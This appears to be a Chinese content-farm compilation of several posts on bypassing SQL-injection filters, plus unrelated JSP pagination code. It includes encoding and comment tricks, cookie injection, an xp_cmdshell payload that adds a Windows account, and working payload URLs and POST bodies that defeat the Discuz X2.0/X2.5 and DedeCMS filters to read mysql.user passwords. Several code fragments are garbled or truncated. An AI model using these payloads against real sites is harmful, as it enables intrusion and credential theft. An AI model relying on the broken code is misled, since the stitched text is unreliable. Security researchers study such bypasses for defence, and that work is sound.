一种防注入代码的绕过学习总结

以下是小编精心整理的一种防注入代码的绕过学习总结（共含17篇），希望对大家有所帮助。同时，但愿您也能像本文投稿人“马利什是好孩子”一样，积极向本站投稿分享好文章。

篇1：一种防注入代码的绕过学习总结

算不上原创，就不写了，

文章的想法，就是学习记录一下这个学习的过程……

没有创新的东东，都是前辈的东西。自己的总结……

前些阵子讯时系统爆出了很多洞，先看他的怎么写的，下面是从他的admin_conn.asp文件中找到的。

sss=LCase(request.servervariables(”QUERY_STRING”))

if instr(sss,”select”)0 or instr(sss,”inster”)0 or instr(sss,”delete”)0 or

instr(sss,”(”)0 or instr(sss,”‘or”)0 then

response.write “你的网址不合法”

response.end

end if

代码使用了 request.servervariables的方法来获得传递过来的数据，然后赋值给sss。再判断传递过来的sss变量中是否含有 select，inster等敏感的字符串，只要有就结束程序。给普通注入造成了极大的麻烦，需要有新的东西出现来突破这个防注入。

现已知的有两种方法：

1.使用URL编码我们传递的数据，比如select可以编码为selec%74（即将t转换为url编码），这样就可以实现注入了！

2.使用cookies注入。

先 看看第1种怎么实现的吧。因为程序接受的参数使用的是request.servervariables，呵呵，这个方法和我们平时的request不太一 样的，因为它接受的数据都会原封不动的接受的，比如我们传递了selec%74，那么这里sss里就会是selec%74，而不是已经解码的select 字符串了。当下面的判断语句来判断时会因为selectselec%74而绕过检测！

第 2种利用了request的cookie方法来传递数据，为什么呢?看程序的代码我们知道因为他只判断了使用 request.servervariables(”QUERY_STRING”)来接受的数据，我们如果用cookie来传递的话，程序当然不会去检测了，只要在前面的代码中找到一处使用request的方法接收变量的地方。这就是cookie的注射了。比如：前面有这样代码我们就可以实现cookie 注射了.这次代码在讯时admin_news_view.asp中截的。

<%

newsid=trim(request(”newsid”))

sql = “select * from news where id=”&newsid

Set rs = Server.CreateObject(”ADODB.RecordSet”)

rs.Open sql,conn,1,1

title=rs(”title”)

dat=rs(”time”)

hit=rs(”hit”)+1

content=rs(”content”)

%>

使用了request接收，而它会依次的去用3种数据集合（Form，QueryString，cookie）去判断，所以我们可以使用cookie来提交我们构造的SQL语句了.这里就不在截图了，具体可以参考这篇文章《最新版讯时新闻发布系统惊爆cookie漏洞》

但是并不是所有的程序都这么另人兴奋的哦，上次入侵一个站时，就碰到了这种情况，找到了源码下来看，却没有突破这个防注入，

电脑资料

代码如下：

sub check

Fy_Url=Request.ServerVariables(”QUERY_STRING”)

Fy_a=split(Fy_Url,”&”)

redim Fy_Cs(ubound(Fy_a))

On Error Resume Next

for Fy_x=0 to ubound(Fy_a)

Fy_Cs(Fy_x) = left(Fy_a(Fy_x),instr(Fy_a(Fy_x),”=”)-1)

Next

For Fy_x=0 to ubound(Fy_Cs)

If Fy_Cs(Fy_x)”“ Then

If Instr(LCase(Request(Fy_Cs(Fy_x))),”‘”)0 or Instr(LCase(Request(Fy_Cs

(Fy_x))),”and”)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”select”)0 or Instr(LCase

(Request(Fy_Cs(Fy_x))),”union”)0 or Instr(LCase(Request(Fy_Cs(Fy_x))),”from”)0 or

Instr(LCase(Request(Fy_Cs(Fy_x))),” “)0 Then

response.Write(”嘿嘿，不要你注射！屏蔽了关键字，但是这个屏蔽程序却不好——如何突破呢？”)

Response.End

End If

End If

Next

end sub

这样的代码，都是用了Request.ServerVariables(”QUERY_STRING”)来接收的数据，但是你直接将注入的字符URL编码，会看到仍不能注射！

那到底怎么去突破呢?看下面！lake2大牛曾经写过一篇突破这种防注入的大作，这个方法也就是大牛发现的！ 写的很详细哦，我们就引用大牛的话来解释一下这个绕过机制。“Request.ServerVariables(”QUERY_STRING”)是得到客户端提交的字符串，这里并不会自动转换url编码，哈哈，如果我们把name进行url编码再提交的话，呵呵，那就可以绕过检查了。”下面是我的理解，因为程序使用 Instr(LCase(Request(Fy_Cs(Fy_x))),”‘”)0这样的判断语句，它是判断了name的值即 value，而且使用request来接收数据的.前面我们如果在url里value我们用url编码后来提交，然后当值传递到这里，就又会被解码了，所以程序可以检测得到.注意，但它只是判断了name的值即value，但对name，可以看到没有判断，而它又是通过name这个变量名来判断SQL语句的，所以只要用url编码name就可以了，然后程序仍是去判断name的值，但是这次是i%64，会被转换为id，可是我们并没有赋值给id而是 i%64，呵呵，那么id的值它就会认为是空，就这样绕过了哦！

可以看出只要能保证前面接收的方式不能解码，后面判断的语句可以解码就可以绕过了。后来胡思乱想到了chr()函数，只是YY了一下…..也没成。

而且这里是不是也可以用cookie注射呢？我测试的时候没有成，可能找的不是用request接受的地方….

就记录这些……

一些地方只是自己的理解，难免有误啊，欢迎扔砖！

by salors

篇2：PHP通用防注入安全代码

/*************************

说明：

判断传递的变量中是否含有非法字符

如$_POST、$_GET

功能：

防注入

**************************/

//要过滤的非法字符

$ArrFiltrate=array(”'“,”;“,”union“);

//出错后要跳转的url,不填则默认前一页

$StrGoUrl=”“;

//是否存在数组中的值

function FunStringExist($StrFiltrate,$ArrFiltrate){

foreach ($ArrFiltrate as $key=>$value){

if (eregi($value,$StrFiltrate)){

return true;

}

}

return false;

}

//合并$_POST 和 $_GET

if(function_exists(array_merge)){

$ArrPostAndGet=array_merge($HTTP_POST_VARS,$HTTP_GET_VARS);

}else{

foreach($HTTP_POST_VARS as $key=>$value){

$ArrPostAndGet[]=$value;

}

foreach($HTTP_GET_VARS as $key=>$value){

$ArrPostAndGet[]=$value;

}

}

//验证开始

foreach($ArrPostAndGet as $key=>$value){

if (FunStringExist($value,$ArrFiltrate)){

echo ”“;

if (empty($StrGoUrl)){

echo ”“;

}else{

echo ”“;

}

exit;

}

}

?>

保存为checkpostandget.php

然后在每个php文件前加include(“checkpostandget.php“);即可

篇3：渗透服务器 绕过防注入文件

这些天给市府组织部修改一套网上视频系统，时间仓促在安全性方面也没有多少考虑，礼拜天闲来无事就总结一些HACK常用的注入手段

and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =

而这里最难处理的就是select这个关键字了，那么我们怎样来突破他们呢？问题虽未完全解决，但还是说出来与大家分享一下，希望能抛砖引玉。

对于关键字的过滤，以下是我收集的以及我个人的一些想法。

1、运用编码技术绕过

如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

2、通过空格绕过

如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如or' swords' =‘swords' ，由于mssql的松散性，我们可以把or 'swords' 之间的空格去掉，并不影响运行。

3、运用字符串判断代替

用经典的or 1=1判断绕过,如or 'swords' ='swords'，这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过

可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or 'swords' = N' swords' ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过

效果值得考证，但毕竟是一种方法。如 or 'swords' =‘sw' +' ords' ；EXEC(‘IN' +' SERT INTO '+' …..' )

6、通过LIKE绕过

以前怎么就没想到呢？如or 'swords' LIKE 'sw'！！！显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过

与上面的LIKE的思路差不多,如or 'swords' IN ('swords')

8、通过BETWEEN绕过

如or 'swords' BETWEEN 'rw' AND 'tw'

9、通过>或者<绕过>

or 'swords' >'sw'

or 'swords' < 'tw'

or 1<3

……

10、运用注释语句绕过

用/**/代替空格，如：UNION /**/ Select /**/user，pwd，from tbluser

用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来

0x730079007300610064006D0069006E00 =hex(sysadmin)

0x64006F006F0077006E0065007200 =hex(db_owner)

另外，关于通用点的过滤方法，我们可以考虑采用赋值的方法，例如先声明一个变量a，然后把我们的指令赋值给a，然后调用变量a最终执行我们输入的命令，

变量a可以是任何命令。如下：

declare @a sysname

select @a=

exec master.dbo.xp_cmdshell @a

效果：

www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e0065007400750073006500700061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;--

其中的 0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 就是“net user angel pass /add”的意思。

这个是突破单个如NoSqlHack这类文件的。但我认为最重要的是要考虑服务器的安全，配置安全，有健全的防火墙和杀毒软件。就这样吧。也很久没更新BOLG了。

篇4：绕过防注入的几种方法

1、运用编码技术绕过

如URLEncode编码，ASCII编码绕过，例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

2、通过空格绕过

如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如

or swords =‘swords，由于mssql的松散性，我们可以把or swords 之间的空格去掉，并不影响运行。

3、运用字符串判断代替

用经典的or 1=1判断绕过,如or swords =swords，这个方法就是网上在讨论的。

4、通过类型转换修饰符N绕过

可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or swords = N swords ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过

效果值得考证，但毕竟是一种方法。如or swords =‘sw + ords ；EXEC(‘IN + SERT INTO + ….. )

6、通过LIKE绕过

以前怎么就没想到呢？如orswords LIKE sw！！！显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过

与上面的LIKE的思路差不多,如or swords IN (swords)

8、通过BETWEEN绕过

如or swords BETWEEN rw AND tw

9、通过>或者<绕过>

or swords >sw

or swords < tw

or 1<3

……

10、运用注释语句绕过

用/**/代替空格，如：UNION /**/ Select /**/user，pwd，from tbluser

用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来

0x730079007300610064006D0069006E00 =hex(sysadmin)

0x640062005F006F0077006E0065007200 =hex(db_owner)

12、大小写互换绕过

select 可以写成 SelEct

union 可以写成 UnIoN

13、多种编码组合绕过

常用的有BASE64、ASC、SQL、HEX、URL编码

14、利用中转工具绕过

可以利用刺猬的中转工具来绕过

15、利用特殊字符填充绕过

这些特殊字符，会被解释成空格，方式和通过空格绕过一样的，一般用来绕过第三方防火墙软件

16、改变攻击方式

如果get提交实在无法绕过，可以尝试改变攻击方式，

如；post注入、寻找子站、旁站……等，如有疑问可以随时联系我QQ814360954哦，我很乐意和大家交流 技术。

篇5： 的绕过防注入技巧 武林安全网

1、运用字符串判断代替

用经典的or 1=1判断绕过,如or 'swords' ='swords'，这个方法就是网上在讨论的，

必备的绕过防注入技巧 武林安全网

。

2、通过空格绕过

如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如

or' swords' =‘swords'，由于mssql的松散性，我们可以把or 'swords' 之间的空格去掉，并不影响运行。

3、运用编码技术绕过

如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

4、通过类型转换修饰符N绕过

可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or 'swords' = N' swords' ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过

效果值得考证，但毕竟是一种方法。如or 'swords' =‘sw' +' ords' ；EXEC(‘IN' +' SERT INTO '+' …..' )

6、通过LIKE绕过

以前怎么就没想到呢？如or'swords' LIKE 'sw'！！！显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过

与上面的LIKE的思路差不多,如or 'swords' IN ('swords')

8、通过BETWEEN绕过

如or 'swords' BETWEEN 'rw' AND 'tw'

9、通过>或者<绕过>

or 'swords' >'sw'

or 'swords' < 'tw'

or 1<3

……

10、运用注释语句绕过

用/**/代替空格，如：union  select /**/user，pwd，from tbluser

用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来

0x730079007300610064006D0069006E00 =hex(sysadmin)

0x64006F006F0077006E0065007200 =hex(db_owner)

篇6：几种通用防注入程序绕过方法脚本安全

0x00 前言

目前主流的CMS系统当中都会内置一些防注入的程序，例如Discuz、dedeCMS等，本篇主要介绍绕过方法，

0x01 Discuz x2.0防注入

防注入原理

这里以Discuz最近爆出的一个插件的注入漏洞为例，来详细说明绕过方法。

漏洞本身很简单，存在于/source/plugin/v63shop/config.inc.php中的第29行getGoods函数中，代码如下所示

function getGoods($id){      $query = DB::query('select * from '.DB::table('v63_goods').' where `id` ='.$id);        $goods = DB::fetch($query);        $goods['endtime2'] = date('Y-m-d',$goods['endtime']);        $goods['price2'] = $goods['price'];        if($goods['sort'] ==2){            $goods['endtime2']= date('Y-m-d H:i:s',$goods['endtime']);            $query = DB::query(”select * from “.DB::table('v63_pm').” where gid='$goods[id]' order by id desc “);            $last = DB::fetch($query);            if(is_array($last)){                $goods['price'] = $last['chujia'];                $goods['uid']  = $last['uid'];                $goods['username']  = $last['username'];                $goods['pm'] = $last;                if(time+600>$goods['endtime']){                    $goods['endtime'] = $last[time]+600;                    $goods['endtime2']= date('Y-m-d H:i:s',$last[time]+600);                }            }        }        return $goods;}

触发漏洞的入口点在/source/plugin/v63shop/goods.inc.php中的第6行和第8行，如图所示： 

下面可以构造如下请求触发漏洞了，如图所示： 

不过程序内置了一个_do_query_safe函数用来防注入，如图所示 

这里跟踪一下_do_query_safe()函数的执行，它会对以下关键字做过滤，如图所示：



因为我们的url中出现了union select，所以会被过滤掉。

绕过方法

这里利用Mysql的一个特性绕过_do_query_safe函数过滤，提交如下url：

localhost/discuzx2/plugin.php?id=v63shop:goods&pac=info&gid=1 and 1=2 union /*!50000select*/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user

这里我们跟踪一下，绕过的具体过程。它会将/**/中间的内容去掉，然后保存在$clean变量中，其值为

select * from pre_v63_goods where `id` =1 and 1=2 union /**/ 1,2,3,4,5,6,concat(user,0x23,password),8,9,10,11,12,13 from mysql.user

再进一步跟踪，它会将/**/也去掉，然对$clean变量做过滤，如图所示

 此时$clean值，如图所示 

此时$clean变量中不在含有危险字符串，绕过_do_query_safe函数过滤，成功注入，截图如下： 

0x02 Discuz X2.5防注入

防注入原理

Discuz X2.5版修改了防注入函数的代码，在/config/config_global.php中有如下代码，如图所示 

这里$_config['security']['querysafe']['afullnote'] 默认被设置为0，重点关注这一点。

这里跟踪一下失败的原因，如图所示： 

此时观察一下变量，_do_query_safe($sql)函数会将/**/中的内容去掉，然后存到$clean中，如图所示： 

其实，程序执行到这里跟Discuz X2.0没有区别，$clean的值都一样。但是关键在下面，如图所示：

 因为前面提到$_config['security']['querysafe']['afullnote']=’0’，所以这里不会替换/**/为空，并且它在后面会判断$clean中是否会出现“/*”，如图所示：  

所以注入失败。

绕过方法

在Mysql当中，定义变量用@字符，可以用set @a=’abc’，来为变量赋值。这里为了合法的构造出一个单引号，目的是为了让sql正确，我们可以用@'放入sql语句当中，帮助我们绕过防注入程序检查。

这里利用如下方式绕过_do_query_safe函数过滤，如下所示：

localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=@`'` union select @`'`,2,3,4,5,6,7,concat(user,0x3a,password),9,10,11,12,13,14 from mysql.user

这里跟踪一下执行的过程，如图所示：

 这里有一个if判断，重点看这句

$clean = preg_replace(”/'(.+?)'/s“, '', $sql);

它会将$sql中单引号引起来的字符串省略掉，所以我们可以用绕过dede防住ids的思路，利用

@`'` union select @`'`

这样的方法，在下面的过滤中省掉union select，这里跟踪一下，如图所示： 

这样便绕过了_do_query_safe函数检测，成功绕过防注入，如图所示： 

不过后来Discuz官方发布了一个修复补丁，但并没用从根本上解决问题。官方的修复代码如下： 

加了一个判断，过滤字符串中的@，但是始终没有修复根本问题，关键是上边的那个if判断会将单引号之间的内容（包括单引号）替换为空，代码如下：

if (strpos($sql, '/') === false && strpos($sql, '#') === false && strpos($sql, '-- ') === false) {    $clean = preg_replace(”/'(.+?)'/s“, '', $sql);}

这里我只要稍做一下变换就可以让@字符消失，从而绕过它的过滤，利用如下所示：

localhost/discuz/plugin.php?id=v63shop:goods&pac=info&gid=`'` or @`''` union select 1 from (select count(*),concat((select database()),floor(rand(0)*2))a from information_schema.tables group by a)b where @`'`

这里我引入了`'`用来隐藏第一个@字符，并将第一个@`'`替换为@`''`，这样便可以替换掉第二个@，这里我们跟踪一下代码，如图所示： 

可以看到$clean变为

select * from pre_v63_goods where `id` =``

成功绕过补丁，如图所示：

 不过这样做的代价是不能再使用union select了，只能通过报错获取数据。

0x03 DedeCMS防注入

防注入原理

这里我也以最近热点分析的dedeCMS feedback.php注入漏洞为例，分析如何绕过其防注入系统。不过在这之前，还得先提一下这个漏洞。

漏洞存在于/plus/feedback.php中的第244行，代码如下所示

if($comtype == 'comments')    {        $arctitle = addslashes($title);        0id = intval(0id);        $ischeck = intval($ischeck);        $feedbacktype = preg_replace(”#[^0-9a-z]#i“, ”“, $feedbacktype);        if($msg!='')        {            $inquery = ”INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`)                  VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime', '{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg'); “;            $rs = $dsql->ExecuteNoneQuery($inquery);            if(!$rs)            {                ShowMsg(' 发表评论错误! ', '-1');                //echo $dsql->GetError();                exit();            }        }    }    //引用回复    elseif ($comtype == 'reply')    {        $row = $dsql->GetOne(”SELECT * FROM `#@__feedback` WHERE id ='$fid'“);        $arctitle = $row['arctitle'];        $aid =$row['aid'];        $msg = $quotemsg.$msg;        $msg = HtmlReplace($msg, 2);        $inquery = ”INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)                VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')“;        $dsql->ExecuteNoneQuery($inquery);    }

这里$title变量未初始化，所以$title可以作为可控变量，所以我们可以进一步控制$arctitle。跟踪发现$arctitle被直接带入SQL语句当中，但是这里执行的INSERT语句入库之后会将前面addslashes转义的单引号在会员还原回去。进一步跟踪下面的代码，在第268行，如下所示

$row = $dsql->GetOne(”SELECT * FROM `#@__feedback` WHERE id ='$fid'“);$arctitle = $row['arctitle'];

这里的查询#@__feedback表正式上面INSERT的那个表，arctitle字段取出来放到$arctitle变量当中，继续跟踪到第273行，这下豁然开朗了，

$inquery = ”INSERT INTO `#@__feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`,`mid`,`bad`,`good`,`ftype`,`face`,`msg`)                VALUES ('$aid','0id','$username','$arctitle','$ip','$ischeck','$dtime','{$cfg_ml->M_ID}','0','0','$feedbacktype','$face','$msg')“;

这里$arctitle变量未作任何处理，就丢进了SQL语句当中，由于我们可以控制$title，虽然$arctitle是被addslashes函数处理过的数据，但是被INSERT到数据库中又被还原了，所以综合起来这就造成了二次注入漏洞。

但是这里如何利用呢，通过跟踪代码发现，整个dede在整个过程中始终没有输出信息，所以我们无法通过构造公式报错来获取数据，但是进一步分析代码发现#@__feedback表当中的msg字段会被输出。由于$arctitle变量是可控的，所以我们可以通过构造SQL语句，将我们要执行的代码插入到msg字段当中，这样便可以输出执行的内容了。

绕过方法

众所周知，dedeCMS内置了一个CheckSql()函数用来防注入，它是80sec开发的通用防注入ids程序，每当执行sql之前都要用它来检查一遍。其代码如下所示：

function CheckSql($db_string,$querytype='select')    {        global $cfg_cookie_encode;        $clean = '';        $error='';        $old_pos = 0;        $pos = -1;        $log_file = DEDEINC.'/../data/'.md5($cfg_cookie_encode).'_safe.txt';        $userIP = GetIP();        $getUrl = GetCurUrl();        //如果是普通查询语句，直接过滤一些特殊语法        if($querytype=='select')        {            $notallow1 = ”[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\.-]{1,}“;            //$notallow2 = ”--|/\*“;            if(preg_match(”/“.$notallow1.”/i“, $db_string))            {                fputs(fopen($log_file,'a+'),”$userIP||$getUrl||$db_string||SelectBreak\r\n“);                exit(”Safe Alert: Request Error step 1 !“);            }        }        //完整的SQL检查        while (TRUE)        {            $pos = strpos($db_string, '\'', $pos + 1);            if ($pos === FALSE)            {                break;            }            $clean .= substr($db_string, $old_pos, $pos - $old_pos);            while (TRUE)            {                $pos1 = strpos($db_string, '\'', $pos + 1);                $pos2 = strpos($db_string, '\\', $pos + 1);                if ($pos1 === FALSE)                {                    break;                }                elseif ($pos2 == FALSE || $pos2 >$pos1)                {                    $pos = $pos1;                    break;                }                $pos = $pos2 + 1;            }            $clean .= '$s$';            $old_pos = $pos + 1;        }        $clean .= substr($db_string, $old_pos);        $clean = trim(strtolower(preg_replace(array('~\s+~s' ), array(' '), $clean)));        //老版本的Mysql并不支持union，常用的程序里也不使用union，但是一些 使用它，所以检查它        if (strpos($clean, 'union') !== FALSE && preg_match('~(^|[^a-z])union($|[^[a-z])~s', $clean) != 0)        {            $fail = TRUE;            $error=”union detect“;        }        //发布版本的程序可能比较少包括--,#这样的注释，但是 经常使用它们        elseif (strpos($clean, '/*') >2 || strpos($clean, '--') !== FALSE || strpos($clean, '#') !== FALSE)        {            $fail = TRUE;            $error=”comment detect“;        }        //这些函数不会被使用，但是 会用它来操作文件，down掉数据库        elseif (strpos($clean, 'sleep') !== FALSE && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s', $clean) != 0)        {            $fail = TRUE;            $error=”slown down detect“;        }        elseif (strpos($clean, 'benchmark') !== FALSE && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s', $clean) != 0)        {            $fail = TRUE;            $error=”slown down detect“;        }        elseif (strpos($clean, 'load_file') !== FALSE && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s', $clean) != 0)        {            $fail = TRUE;            $error=”file fun detect“;        }        elseif (strpos($clean, 'into outfile') !== FALSE && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s', $clean) != 0)        {            $fail = TRUE;            $error=”file fun detect“;        }        //老版本的MYSQL不支持子查询，我们的程序里可能也用得少，但是 可以使用它来查询数据库敏感信息        elseif (preg_match('~\([^)]*?select~s', $clean) != 0)        {            $fail = TRUE;            $error=”sub select detect“;        }        if (!empty($fail))        {            fputs(fopen($log_file,'a+'),”$userIP||$getUrl||$db_string||$error\r\n“);            exit(”Safe Alert: Request Error step 2!“);        }        else        {            return $db_string;        }    }

但通过跟踪这段代码发现，它有个特征就是会将两个单引号之间的内容用$s$替换，例如’select’会被替换为$s$，这里用两个@`'`包含敏感字，这样$clean变量中就不会出现敏感字，从而绕过CheckSql()函数检测，

这里可以设置title为如下代码，一方面绕过ids防注入代码检测，另一方面加一个#注释掉后面的代码，但是还要做一下变形，就是这个char(@`'`)了。因为#@__feedback的所有字段都被设置为NOT NULL，而@`'`是一个变量，默认为NULL，直接插入@`'`的话会报错，所以需要以char(@`'`)的方法转换一下。

',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,

跟踪代码，如图所示 

如下SQL语句

INSERT INTO `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) VALUES ('1','1','游客','\',char(@`\'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,','127.0.0.1','1','1364401789', '0','0','0','feedback','1','genxor');

被替换为了

insert into `dede_feedback`(`aid`,`typeid`,`username`,`arctitle`,`ip`,`ischeck`,`dtime`, `mid`,`bad`,`good`,`ftype`,`face`,`msg`) values ($s$,$s$,$s$,$s$,$s$,$s$,$s$, $s$,$s$,$s$,$s$,$s$,$s$);

字符串中没有任何敏感字，成功绕过CheckSql()函数检测。

POST如下请求给feedback.php，如下所示：

action=send&comtype=comments&aid=1&isconfirm=yes&feedbacktype=feedback&face=1&msg=genxor¬user=1&typeid=1&title=',char(@`'`),1,1,1,1,1,1,1,(SELECT user()))#,(1,

跟踪代码，实际执行的SQL语句跟踪变量如下所示： 

入数据库中的内容，如图所示： 

下面再POST如下内容给feedback.php，

action=send&comtype=reply&aid=1&isconfirm=yes&feedbacktype=feedback&fid=50

跟踪一下这里执行的SQL语句，如图所示 

所以select user()执行了，并且可以作为msg字段输出。

0x04 总结

在写这篇文章之前，我分析了很多常用的cms系统的源码，包括discuz、dedecms、phpwind、phpcms等，只有在discuz、dedecms这两个系统中用到通用防注入，但是它们所覆盖的用户群已将相当庞大了。如果能在发现程序注入漏洞的情况下，这些绕过方法还是很有价值的。

​

篇7：javaweb代码学习总结

javaweb代码学习总结

什么也不说了，直接上代码：

复制代码 代码如下:

<%@ page=”“ language=”java“ import=”java.util.*“ pageencoding=”UTF-8“>

<%@ taglib=”“ prefix=”s“ uri=”/struts-tags“>

<%

String path = request.getContextPath();

String basePath = request.getScheme()+”://“+request.getServerName()+”:“+request.getServerPort()+path+”/“;

%>

＜meta http-equiv=”pragma“ content=”no-cache“/＞

＜meta http-equiv=”cache-control“ content=”no-cache“/＞

＜meta http-equiv=”expires“ content=”0“/＞

＜meta http-equiv=”keywords“ content=”keyword1,keyword2,keyword3“/＞

＜meta http-equiv=”description“ content=”This is my page“/＞

＜title＞分页＜/title＞

＜meta http-equiv=”Content-Type“ content=”text/html; charset=utf-8“/＞

＜script type=”text/javascript“＞

var tableData = [{”C0“:”临夏州_康乐县“,”C1“:190893.39,”C2“:24544.65,”AREA_ID“:”930013005“},{”C0“:”临夏州_永靖县“,”C1“:368900.35,”C2“:40592.19,”AREA_ID“:”930013006“},{”C0“:”兰州市_东岗分局“,”C1“:88.48,”C2“:126.4,”AREA_ID“:”930013106“},{”C0“:”临夏州_临夏县“,”C1“:107337.9,”C2“:20612.1,”AREA_ID“:”930013008“},{”C0“:”临夏州_广河县“,”C1“:69738.07,”C2“:34894.44,”AREA_ID“:”930013003“},{”C0“:”临夏州_和政县“,”C1“:46622.96,”C2“:20954.97,”AREA_ID“:”930013002“},{”C0“:”临夏州_东乡县“,”C1“:96021.84,”C2“:16725.63,”AREA_ID“:”930013004“},{”C0“:”临夏州_临夏市中心“,”C1“:1845311.12,”C2“:129478.93,”AREA_ID“:”930013001“},{”C0“:”天水市_秦州区“,”C1“:0,”C2“:0,”AREA_ID“:”930013801“},{”C0“:”临夏州_积石山“,”C1“:256181.79,”C2“:15185.98,”AREA_ID“:”930013007“},{”C0“:”酒泉_肃州区“,”C1“:264312,”C2“:402.6,”AREA_ID“:”930013701“}];

var columns = [{”cid“:”C0“,”ctext“:”区县“},{”cid“:”C1“,”ctext“:”客户总收入“},{”cid“:”C2“,”ctext“:”当月出账费用“}];

/**

page:页码

pageSize:每页的记录条数

此方法除了传入page和pageSize之外，还应知道的有三个参数：

一、表的全部数据，json串格式，可通过action查询数据库得到。

二、表头所对应的列的key及名称，也是json串格式

三、表所对应的id

注：此处只是适合表头只有一行，且事先写好的情况。您可以根据需要改一下，逻辑思路就是这样，欢迎批评指正。

*/

function splitPage(page,pageSize){

var ptable = document.getElementById(”page_table“);

var num = ptable.rows.length;//table.rows返回表格中包含的所有行，此处假设表由表头1行和表体N行组成

//alert(num);

//清除tbody

for(var i=num-1;i>0;i--){

ptable.Row(i);

}

var totalNums = tableData.length;//总行数

var totalPage = Math.ceil(totalNums/pageSize);//总页数

var begin = (page-1)*pageSize;//页起始位置(包括)

var end = page*pageSize;//页结束位置(不包括)

end = end>totalNums?totalNums:end;

//向tbody中写入数据

var n = 1;//tbody的起始行

for(var i=begin;i

var row = ptable.Row(n++);

var rowData = tableData[i];

for(var j=0;j

var col = columns[j].cid;

var cell = row.Cell(j);

var cellData = rowData[col];

cell.innerHTML = cellData;

}

}

//生成分页工具条

var pageBar = ”第“+page+”页/共“+totalPage+”页“+” “;

if(page>1){

pageBar += ”首页 “;

}else{

pageBar += ”首页 “;

}

if(page>1){

pageBar += ”

＜/script＞

篇8：多多淘宝客V7.4绕过防注入及一个注入漏洞的分析

本文详解了多多淘宝客V7.4绕过防注入及一个注入漏洞的分析

并下载其程序看了一番，其实程序员还是有一点安全意识的：

防注入代码：

复制代码

//要过滤的非法字符

$ArrFiltrate = array (

“#union#i”,

“#<scripti p=”p“>

”#/script.>#i“,

”#select#i“,

”#alert#i“,

”#javascript#i“,

”#

“#

”#\“#i”,

“#\'#i”,

“#delete#i”,

“#vbscript#i”,

“#applet#i”,

“#frame#i”,

“#

”#update#i“,

”#'#i“,

”#union #i“,

”#select #i“,

”#delete #i“,

”#update #i“,

”#and #i“,

”#;#i“,

”#update#i“

);

$replacements='';

function FunStringExist(&$array,$ArrFiltrate,$replacements)

{

if (is_array($array))

{

foreach ($array as $key =>$value)

{

if (is_array($value))

FunStringExist($array[$key],$ArrFiltrate,$replacements);

else

$array[$key] = preg_replace($ArrFiltrate, $replacements, $value);

}

}

}

FunStringExist($_GET,$ArrFiltrate,$replacements);

FunStringExist($_POST,$ArrFiltrate,$replacements);

这段代码多少还是有瑕疵的、只过滤www.jb51.net get post 我们只要找调用request的地方

别一个文件并没有调用防注入程序，导致字符注入、但受gpc影响

复制代码

代码如下:

header(”Content-Type:text/html;charset=utf-8“);

include ”../comm/config.php“;

$uname = trim($_GET[”name“]);

if($uname==''){

echo ”true“;

}else{

